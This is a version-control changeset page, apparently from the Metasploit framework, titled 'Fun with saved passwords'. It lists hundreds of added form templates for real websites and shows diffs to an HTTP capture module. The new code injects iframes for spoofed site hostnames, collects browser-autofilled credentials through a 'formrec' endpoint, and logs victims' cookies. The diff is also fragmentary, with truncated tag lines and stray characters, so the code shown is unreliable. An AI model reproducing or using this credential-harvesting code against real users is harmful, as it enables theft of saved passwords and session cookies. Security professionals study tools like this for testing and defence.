Changeset 5490

Timestamp:

04/22/08 13:48:21 (3 weeks ago)

Author:

hdm

Message:

Fun with saved passwords

Files:

• framework3/trunk/data/exploits/capture/http/forms (added)
• framework3/trunk/data/exploits/capture/http/forms/01net.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/126.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/163.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/1und1.de.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/21cn.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/2ch.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/4shared.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/56.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/6park.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/89.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/abcnews.go.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/about.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/addictinggames.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/adobe.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/adult-empire.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/adultadworld.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/adultfriendfinder.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/alice.it.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/allegro.pl.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/allocine.fr.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/altavista.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/altervista.org.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/amazon.co.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/amazon.co.uk.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/amazon.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/amazon.de.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/anonym.to.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/answers.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/aol.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ask.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/att.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/atwiki.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/aweber.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/badoo.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/bbc.co.uk.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/bebo.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/bestbuy.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/bharatstudent.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/bild.de.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/blogfa.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/bramjnet.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/break.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/btjunkie.org.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/buzznet.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/careerbuilder.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/chase.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/china.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/chinaren.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/clicksor.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/cnet.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/cnn.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/commentcamarche.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/conduit.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/crunchyroll.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/dada.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/dailymotion.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/dantri.com.vn.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/daum.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/dealtime.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/depositfiles.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/deviantart.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/dmm.co.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/doubleclick.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/download.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/dtiblog.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/eastmoney.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/easy-share.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ebay.co.uk.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ebay.com.au.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ebay.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ebay.de.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ebay.es.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ebay.fr.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ebay.it.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/engadget.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/esnips.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/espn.go.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/excite.co.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/expedia.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ezinearticles.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/facebook.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/fanfiction.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/fc2.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/fc2web.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/filefront.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/files.wordpress.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/flickr.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/fling.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/flixster.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/flurl.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/forbes.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/fotka.pl.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/fotolog.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/foxsports.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/free.fr.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/freeones.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/freewebs.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/friendster.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/gaiaonline.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/gamefaqs.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/gamespot.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/gametrailers.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/geocities.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/globo.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/gmx.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/go.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/goo.ne.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.ae.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.at.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.be.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.ca.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.ch.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.cl.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.cn.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.co.hu.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.co.id.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.co.in.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.co.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.co.th.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.co.uk.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.co.ve.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.co.za.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.ar.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.au.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.br.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.co.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.eg.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.mx.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.my.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.pe.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.ph.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.pk.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.sa.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.sg.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.tr.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.tw.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.ua.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.com.vn.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.de.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.dk.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.es.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.fi.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.fr.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.gr.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.ie.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.it.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.pl.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.pt.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.ro.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/google.se.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/googlesyndication.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/grabforms.rb (added)
• framework3/trunk/data/exploits/capture/http/forms/guardian.co.uk.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/gyao.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/hao123.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/hi5.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/homeway.com.cn.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/hornymatches.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/hp.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/hurriyet.com.tr.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/hyves.nl.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ibm.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ifeng.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ifolder.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ig.com.br.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ign.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/imagefap.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/imageshack.us.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/imagevenue.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/imdb.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/imeem.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/indiatimes.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/information.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/infoseek.co.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/interia.pl.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/isohunt.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/istockphoto.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/iwiw.hu.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/jugem.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/kakaku.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/kooora.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ku6.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/last.fm.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/leonardo.it.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/letitbit.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/libero.it.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/linkedin.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/linternaute.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/live.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/livedoor.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/liveinternet.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/livejournal.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/livescore.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mail.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/maktoob.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mapquest.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/marca.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/marketgid.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mediafire.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/meebo.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/megaclick.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/megaupload.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/megavideo.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mercadolibre.com.ar.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mercadolibre.com.mx.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mercadolivre.com.br.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/metacafe.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/metroflog.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mforos.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/microsoft.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/milliyet.com.tr.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/miniclip.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/minijuegos.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mininova.org.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mixi.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mlb.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mobile.de.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/monster.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mop.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mozilla.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mozilla.org.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/msn.ca.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/msn.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mtv.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/multiply.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/musica.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/myfreepaysite.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/myspace.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/myvideo.de.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/mywebsearch.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/narod.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/naukri.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/naver.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/nba.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/neopets.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/netlog.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/newegg.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/newgrounds.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/nicovideo.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/nifty.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/nnm.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/no-ip.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/odnoklassniki.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/orange.fr.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/over-blog.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/partypoker.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/pchome.com.tw.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/people.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/perezhilton.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/perfspot.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/photobucket.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/pogo.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/pornhub.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/pornotube.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/qq.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/rakuten.co.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/rambler.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/rapidshare.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/rapidshare.de.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/redtube.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/reference.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/repubblica.it.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/reuters.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/rude.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/sakura.ne.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/sapo.pt.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/schuelervz.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/seesaa.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/sendspace.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/sexyono.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/seznam.cz.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/shopping.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/sify.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/skype.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/skyrock.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/slickdeals.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/slide.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/softonic.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/softpedia.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/sogou.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/sohu.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/sonico.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/soso.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/soufun.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/sourceforge.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/spiegel.de.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/squidoo.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/starware.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/studiverzeichnis.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/symantec.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/tagged.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/taobao.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/taringa.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/technorati.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/terra.com.br.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/thefreedictionary.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/thepiratebay.org.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/thottbot.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/tianya.cn.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/tinypic.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/tom.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/torrentreactor.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/torrentz.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/torrentz.ws.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/tripod.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/truveo.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/tu.tv.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/tudou.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/tv.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ucoz.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ultimate-guitar.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/uol.com.br.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ups.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/usercash.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/vagos.es.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/veoh.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/verizon.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/verycd.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/videosz.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/vkontakte.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/vmn.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/walmart.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wamu.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/warez-bb.org.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/washingtonpost.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/weather.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/web.de.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/webshots.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wikia.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wikipedia.org.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wordpress.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wordreference.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wow-europe.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wowarmory.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wowhead.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wp.pl.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wretch.cc.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wsj.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/wwe.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/www.heise-online.co.uk.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/xanga.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/xboard.us.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/xbox.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/xhamster.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/xiaonei.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/xunlei.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/xvideos.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/yahoo.co.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/yahoo.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/yandex.ru.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/yaplog.jp.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/youku.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/youporn.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/yourfilehost.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/zango.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/zedge.net.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/ziddu.com.txt (added)
• framework3/trunk/data/exploits/capture/http/forms/zshare.net.txt (added)
• framework3/trunk/lib/rex/text.rb (modified) (1 diff)
• framework3/trunk/modules/auxiliary/server/capture/http.rb (modified) (8 diffs)

framework3/trunk/lib/rex/text.rb

@@ -419 +419 @@
-                end
-        end
+
+        #       
+        # Decode a URI encoded string
+        #
+        def self.uri_decode(str)
+                str.gsub(/(%[a-z0-9]{2})/i){ |c| [c[1,2]].pack("H*") }
+        end
-        
-        #

framework3/trunk/modules/auxiliary/server/capture/http.rb

@@ -52 +52 @@
-                                                File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "sites.txt")
-                                        ]
-
+
+
+
+
+
-                        ], self.class)
-        end
@@ -62 +66 @@
-
-        def run
+                @formsdir = datastore['FORMSDIR']
-                @template = datastore['TEMPLATE']
-                @sitelist = datastore['SITELIST']
@@ -152 +157 @@
-
-                cookies = req['Cookie'] || ''
+        
+        
+                if(cookies.length > 0)
+                        report_note(
+                                :host => cli.peerhost,
+                                :type => "http_cookies",
+                                :data => hhead + " " + cookies
+                        )
+                end
-                
-
@@ -184 +198 @@
-                end
-                
-
+\/*
-                        prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }"
-                        res = 
@@ -196 +210 @@
-                        return
-                end
+        
+        
+                if(req.resource =~ /^\/*formrec\/(.*)/i)                
+                        data = Rex::Text.uri_decode($1).split("\x00").join(", ")
+
+                        report_note(
+                                :host => cli.peerhost,
+                                :type => "http_formdata",
+                                :data => hhead + " " + data
+                        )
+                        
+                        res = 
+                                "HTTP/1.1 200 OK\r\n" +
+                                "Host: #{hhead}\r\n" +
+                                "Content-Type: text/html\r\n" +
+                                "Content-Length: 0\r\n" +
+                                "Connection: Close\r\n\r\n"
+                                
+                        print_status("HTTP form data received for #{hhead} from #{cli.peerhost} (#{data})")
+                        cli.put(res)
+                        return
+                end
-                
-                print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers} cookies=#{cookies}")
+                                
+                if(req.resource =~ /^\/*forms.html$/)
+                        frm = inject_forms(hhead)
+                        res = 
+                                "HTTP/1.1 200 OK\r\n" +
+                                "Host: #{hhead}\r\n" +
+                                "Content-Type: text/html\r\n" +
+                                "Content-Length: #{frm.length}\r\n" +
+                                "Connection: Close\r\n\r\n#{frm}"
+                        cli.put(res)
+                        return
+                end
+                
+                
+
-                
-                
@@ -244 +295 @@
-                           "Content-Length: #{data.length}\r\n" +
-                           "Connection: Close\r\n\r\n#{data}"
-
-
-
-
-                        cli.put(res)
-                        return
@@ -260 +307 @@
-                        site.strip!
-                        next if site.length == 0
-mg src='http://#{site}/pixel.gif'
+frame src='http://#{site}:#{@myport}/forms.html'></iframe